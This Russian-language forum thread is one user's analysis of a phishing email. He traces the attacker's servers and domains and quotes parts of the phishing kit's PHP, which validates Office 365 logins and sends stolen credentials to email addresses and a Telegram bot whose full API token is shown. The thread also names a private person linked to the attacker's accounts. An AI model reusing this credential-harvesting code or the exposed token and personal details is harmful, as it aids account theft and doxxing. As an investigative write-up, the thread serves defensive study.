Загрузка...

Как НЕ надо делать ******овые атаки

Тема в разделе Уроки создана пользователем akylbek2000 5 май 2020. 1479 просмотров

Загрузка...
  1. akylbek2000
    akylbek2000 Автор темы 5 май 2020 34 14 ноя 2018
    У меня пытались украсть пароль. А я за 5 минут узнал почтовые адреса атакующего, IP его сервера и все принадлежащие ему домены для ******овых атак, получил исходный код его поделок, API телеграмм бота и, может быть, даже IP атакующего и его имя и фамилию (но последние два это не точно)…

    • Уровень сложности поиска - «очень легко».
    • Уровень атакующего - «дно».
    Как всё началось
    Мне на почту пришло письмо:
    [IMG]
    В письме говорилось о каком-то просроченном платеже на $47,500.00.

    Я проверил письмо на сервисе
    Код
    Email прошёл через почтовые узлы:
    tools-on.com (tools-on.com [106.75.96.215]) -> sendmail8.hostland.ru (sendmail8.hostland.ru. [185.26.123.238]) -> mx.google.com -> Delivered-To: proghoster@gmail.com

    Email содержит:
    MIME-parts in this message:
    1 text/html [] (19.1 kB)
    2 Release Pending Messages Form. for al@mi-al.ru.html text/html [attach] (0.3 kB)
    Есть начальный домен и IP: tools-on.com и 106.75.96.215. Забегая вперёд, скажу, что они мне не пригодились.

    Перехожу по ссылке: firebasestorage.googleapis.com/v0/b/countdown-1356c.appspot.com/o/index.htm?alt=media&token=6417c4ca-1a0f-41ca-ab77-7ab01b2a1602#al@mi-al.ru
    [IMG]
    Поскольку сервисами Microsoft, в частности Outlook, я не пользуюсь, то опять можно догадаться, что это ******овая страница.

    Примечательно, что сайт googleapis.com принадлежит Google, и у основного домена, а также у субдомена firebasestorage.googleapis.com IP адреса, принадлежащие Google. Видимо, атакующий использует какие-то из многочисленных сервисов этой компании. Если вы знаете, что такое googleapis.com, то напишите, пожалуйста, в комментариях.

    Разместить страничку на каком-то стороннем сервисе вполне возможно. Но вот что вряд ли возможно, так это разместить PHP скрипт, который будет принимать от этой страницы данные. Поэтому давайте посмотрим, куда отправляются введённые пароли.

    А данные отправляются POST запросом на
    адрес: https://mamasaidmedia.com/.well-known/send/sendnew/index.php

    [IMG]

    Смотрим: https://mamasaidmedia.com/.well-known/
    [IMG]
    Увидели архив send.zip? Я его тоже увидел.

    А вот что я увидел в файле index.php:
    [IMG]
    Вечер перестаёт быть томным.

    Эта часть, судя по всему, проверяет на сервере smtp.office365.com правильные ли учётные данные:
    Код
    $mail->Host = 'smtp.office365.com';
    $message = "";
    $mail->Port = 587;
    $mail->Username = "$em_str";
    $mail->Password = "$pass";
    $mail->setFrom("$user");
    $mail->addAddress('Lilian.Pan@leschaco.com');
    $mail->Subject = "$user";
    $mail->msgHTML("$base");
    Если я не ошибаюсь, email Lilian.Pan@leschaco.com не выполняет никакой функциональности, мог попасть сюда случайно.

    А вот в этой части совсем не случайные электронные адреса:
    Код
    $subject = "OFFICE 365 - $ip";
    $headers = "From: SUCCESS<success@mail.com>";
    $SEND='roomservice801@gmail.com, roomservice801@protonmail.com, ajonwa@enfesdantel.com,;
    Целых три адреса:

    На три этих адреса атакующий отправляет себе введённые логины и пароли.

    Особенно посмотрите на ajonwa@enfesdantel.com — у атакующего есть свой домен. Покупая его и оплачивая хостинг, он использовал ли меры для анонимизации? Ещё есть имя Ajonwa. Приятно звучащее нигерийское имя, может быть как мужским, так и женским.

    Гугление по нику roomservice801 привело на страницу, где написано имя, фамилия, телефон и домены, связанные с почтой roomservice801@gmail.com:
    [IMG]
    Всё так просто, что я начинаю думать, что этого чувака хотят подставить… Некий James Spartar.

    Кстати, потом данные поменялись:
    [IMG]

    Почему на сайте оставлен архив, если он сразу бросается в глаза? У некоторых из доменов на этом сервере (а это виртуальный частный сервер!) раньше были полноценные сайты, но, видимо, после того, как выгнали с очередного хостинга, админ ещё не успел или просто не захотел их разворачивать. Ну или подумал, что и так никто не догадается.

    С помощью сервиса «Список сайтов на одной IP» я нашёл другие сайты на сервере злоумышленника:
    [IMG]
    Сайтов много, в большинстве они имеют следующее содержимое:
    [IMG]
    Для верификации, относятся ли домены к нашему злоумышленнику, можно открыть скрытую папку /.well-known — она есть на всех сайтах злоумышленника. Например, домен thejerseyguy.us/, значит проверяем thejerseyguy.us/.well-known
    [IMG] Сайт mercvdonegro.com опять меня порадовал:
    [IMG]
    Содержимое одного из скриптов:
    [IMG]
    Здорово, да? Вот эти строки мои любимые:
    Код
    $send="omex1231231@gmail.com";
    $subject = "Login | ".$_POST['winners1']." | $ip";
    $headers = "From: Kelly<noreply>";
    @mail($send,$subject,$message,$from);

    $website="https://api.telegram.org/bot1080168055:AAFVrwSmPVa67EVEcKWvCPAQUINbPE9vKdg";
    $chatId=1234567; //Receiver Chat Id
    $params=[
    'chat_id'=>'-343481056',
    'text'=>$message,
    ];
    Ещё один e-mail: omex1231231@gmail.com

    Бот в Телеграме с API: https://api.telegram.org/bot1080168055:AAFVrwSmPVa67EVEcKWvCPAQUINbPE9vKdg

    И идентификатор чата: -343481056

    Это сайт pvadapter.com:
    [IMG]
    В архивах с этого сайта есть файл error_log. Там несколько строк:
    Код
    [08-Aug-2019 07:48:51 GMT] PHP Warning:  simplexml_load_file(http://www.geoplugin.net/xml.gp?ip=37.49.229.24): failed to open stream: Connection timed out in /home/gatkuwat/seltrock.com/Zoon10/target/index.php on line 13
    [08-Aug-2019 07:48:51 GMT] PHP Warning: simplexml_load_file(): I/O warning : failed to load external entity &quot;http://www.geoplugin.net/xml.gp?ip=37.49.229.24&quot; in /home/gatkuwat/seltrock.com/Zoon10/target/index.php on line 13
    [08-Aug-2019 07:50:19 GMT] PHP Warning: simplexml_load_file(http://www.geoplugin.net/xml.gp?ip=37.49.229.24): failed to open stream: HTTP request failed! in /home/gatkuwat/seltrock.com/Zoon10/target/index.php on line 13
    [08-Aug-2019 07:50:19 GMT] PHP Warning: simplexml_load_file(): I/O warning : failed to load external entity &quot;http://www.geoplugin.net/xml.gp?ip=37.49.229.24&quot; in /home/gatkuwat/seltrock.com/Zoon10/target/index.php on line 13
    [08-Aug-2019 07:53:58 GMT] PHP Warning: simplexml_load_file(http://www.geoplugin.net/xml.gp?ip=37.49.229.24): failed to open stream: Connection timed out in /home/gatkuwat/seltrock.com/Zoon10/target/index.php on line 13
    [08-Aug-2019 07:53:58 GMT] PHP Warning: simplexml_load_file(): I/O warning : failed to load external entity &quot;http://www.geoplugin.net/xml.gp?ip=37.49.229.24&quot; in /home/gatkuwat/seltrock.com/Zoon10/target/index.php on line 13
    [08-Aug-2019 07:55:38 GMT] PHP Warning: simplexml_load_file(http://www.geoplugin.net/xml.gp?ip=37.49.229.24): failed to open stream: HTTP request failed! in /home/gatkuwat/seltrock.com/Zoon10/target/index.php on line 13
    [08-Aug-2019 07:55:38 GMT] PHP Warning: simplexml_load_file(): I/O warning : failed to load external entity &quot;http://www.geoplugin.net/xml.gp?ip=37.49.229.24&quot; in /home/gatkuwat/seltrock.com/Zoon10/target/index.php on line 13
    [23-Aug-2019 05:38:17 GMT] PHP Warning: simplexml_load_file(http://www.geoplugin.net/xml.gp?ip=37.49.229.24): failed to open stream: Connection timed out in /home/gatkuwat/seltrock.com/Zoon10/target/index.php on line 13
    [23-Aug-2019 05:38:17 GMT] PHP Warning: simplexml_load_file(): I/O warning : failed to load external entity &quot;http://www.geoplugin.net/xml.gp?ip=37.49.229.24&quot; in /home/gatkuwat/seltrock.com/Zoon10/target/index.php on line 13
    [27-Aug-2019 07:04:11 GMT] PHP Warning: simplexml_load_file(http://www.geoplugin.net/xml.gp?ip=37.49.229.24): failed to open stream: Connection timed out in /home/gatkuwat/seltrock.com/Zoon10/target/index.php on line 13
    [27-Aug-2019 07:04:11 GMT] PHP Warning: simplexml_load_file(): I/O warning : failed to load external entity &quot;http://www.geoplugin.net/xml.gp?ip=37.49.229.24&quot; in /home/gatkuwat/seltrock.com/Zoon10/target/index.php on line 13
    [27-Aug-2019 07:05:09 GMT] PHP Warning: simplexml_load_file(http://www.geoplugin.net/xml.gp?ip=37.49.229.24): failed to open stream: Connection timed out in /home/gatkuwat/seltrock.com/Zoon10/target/index.php on line 13
    [27-Aug-2019 07:05:09 GMT] PHP Warning: simplexml_load_file(): I/O warning : failed to load external entity &quot;http://www.geoplugin.net/xml.gp?ip=37.49.229.24&quot; in /home/gatkuwat/seltrock.com/Zoon10/target/index.php on line 13
    [27-Aug-2019 07:09:49 GMT] PHP Warning: simplexml_load_file(http://www.geoplugin.net/xml.gp?ip=37.49.229.24): failed to open stream: Connection timed out in /home/gatkuwat/seltrock.com/Zoon10/target/index.php on line 13
    [27-Aug-2019 07:09:49 GMT] PHP Warning: simplexml_load_file(): I/O warning : failed to load external entity &quot;http://www.geoplugin.net/xml.gp?ip=37.49.229.24&quot; in /home/gatkuwat/seltrock.com/Zoon10/target/index.php on line 13
    [27-Aug-2019 07:17:40 GMT] PHP Warning: simplexml_load_file(http://www.geoplugin.net/xml.gp?ip=37.49.229.24): failed to open stream: Connection timed out in /home/gatkuwat/seltrock.com/Zoon10/target/index.php on line 13
    [27-Aug-2019 07:17:40 GMT] PHP Warning: simplexml_load_file(): I/O warning : failed to load external entity &quot;http://www.geoplugin.net/xml.gp?ip=37.49.229.24&quot; in /home/gatkuwat/seltrock.com/Zoon10/target/index.php on line 13
    [27-Aug-2019 07:18:31 GMT] PHP Warning: simplexml_load_file(http://www.geoplugin.net/xml.gp?ip=37.49.229.24): failed to open stream: Connection timed out in /home/gatkuwat/seltrock.com/Zoon10/target/index.php on line 13
    [27-Aug-2019 07:18:31 GMT] PHP Warning: simplexml_load_file(): I/O warning : failed to load external entity &quot;http://www.geoplugin.net/xml.gp?ip=37.49.229.24&quot; in /home/gatkuwat/seltrock.com/Zoon10/target/index.php on line 13
    [27-Aug-2019 07:19:42 GMT] PHP Warning: simplexml_load_file(http://www.geoplugin.net/xml.gp?ip=37.49.229.24): failed to open stream: Connection timed out in /home/gatkuwat/seltrock.com/Zoon10/target/index.php on line 13
    [27-Aug-2019 07:19:42 GMT] PHP Warning: simplexml_load_file(): I/O warning : failed to load external entity &quot;http://www.geoplugin.net/xml.gp?ip=37.49.229.24&quot; in /home/gatkuwat/seltrock.com/Zoon10/target/index.php on line 13
    [27-Aug-2019 07:24:41 GMT] PHP Warning: simplexml_load_file(http://www.geoplugin.net/xml.gp?ip=37.49.229.24): failed to open stream: Connection timed out in /home/gatkuwat/seltrock.com/Zoon10/target/index.php on line 13
    Там есть домен seltrock.com и IP адрес 37.49.229.24. Возможно, это адрес атакующего, который попал туда когда он тестировал свои скрипты.

    Ещё один файл:
    [IMG]
    Строка e.mail.auth.imprtntdocumntransfr.ml/.156803442606207257463ed81c0ad005b34d15000415 даёт основание предполагать, что проводилась ******овая атака на домен в зоне .ml.

    В строке можно увидеть российский почтовый домен mail.ru, видимо, целью атаки был пользователь этого почтового сервиса:
    Код
    header("Location: https://e.mail.ru/thread/0:15445325610000000752:500000/");
    [IMG]
    Обратим внимание, что учётные данные просто сохраняются в файл users.txt.

    Прочее
    Ещё не пустые сайты/страницы, но из которых ничего не удалось извлечь полезного:

    Кем-то взломанные сайты с папкой .well-known созданной 2020-04-19:

    Один из представителей не выводящих листинг сайтов, но с папкой .well-known:

    Заключение
    Папки на рассмотренных сайтах созданы в период с 2020-04-19 по 2020-04-22. Некоторые домены в веб-браузере уже помечаются как ******овые, хотя ещё больше из них открываются нормально. Судя по всему, сервер используется для ******овых атак, и судя по количеству доменов, довольно масштабных. И, видимо, атакующий переехал на этот сервер совсем недавно — буквально несколько дней назад.

    Безусловно, изучение истории изменений IP адресов доменов даст ещё больше информации и раскроет новые сетки сайтов.

     
  2. akylbek2000
    akylbek2000 Автор темы 5 май 2020 34 14 ноя 2018
    Кстати на днях солью платёжку Авито скаммеров
    Уже у двоих скамеров заметил через POST криво в PHP отправляется, по ссылке можно открыть (
     
  3. Supremacy
    Supremacy 16 июн 2020 Efficiency 1233 13 янв 2020
    Долго читать, но уже понял что ты хакер ПИЗДЕЦ
    Другой бы тупо забил, но ты решил докопаться, блять по кусочку все собирал чекал домены пхп код ну крч
     
  4. USDC
    тебе просто повезло попасть на безалаберного клоуна, оставившего архив со всеми скриптами в корне сайта, банально не скрыв все эти файлы от посторонних глаз пользователя
    едва ли кто-то попадет в такую же ситуацию, клоунов не так много
     
  5. Xomca
    Xomca 16 июн 2020 Я не буду дышать, потому что это весело 1384 7 апр 2019
    нихуя я охуел жалко челика)
     
  6. Kalashnik111
    Мужчина ты гений
     
  7. Lyux
    Lyux 10 янв 2022 0 10 янв 2022
    Интересно
     
  8. palyka
    palyka 23 мар 2022 52 22 апр 2021
    Чел харош, луцк:licking:
     
Top